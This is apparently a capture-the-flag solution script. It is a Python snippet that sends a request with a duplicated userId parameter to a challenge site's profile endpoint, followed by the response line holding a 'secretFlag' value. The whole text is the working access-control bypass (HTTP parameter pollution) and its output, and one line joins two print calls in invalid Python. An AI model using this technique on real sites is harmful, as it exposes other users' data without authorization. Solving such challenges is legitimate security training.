import requests

url = "https://chal64-654hp2.vercel.app"

r = requests.get(url + '/profile?userId=a&userId=999')

print(r.url) print(r.text)

"secretFlag":"If you got this code you must be the super admin ;-)"